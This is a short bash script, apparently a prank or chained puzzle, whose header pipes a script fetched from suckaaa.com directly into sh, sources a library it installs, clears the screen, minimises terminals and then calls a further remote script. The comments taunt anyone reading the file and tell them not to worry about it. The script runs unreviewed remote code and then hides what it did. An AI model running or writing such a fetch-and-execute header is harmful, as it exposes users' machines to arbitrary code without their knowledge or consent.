#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.complete-garbage/lib;
clear;
###########  END HEADER  ###########

minimizeAllTerminals;

# Run the next script
nextScript 'https://suckaaa.com/s/that-was-weird-right';
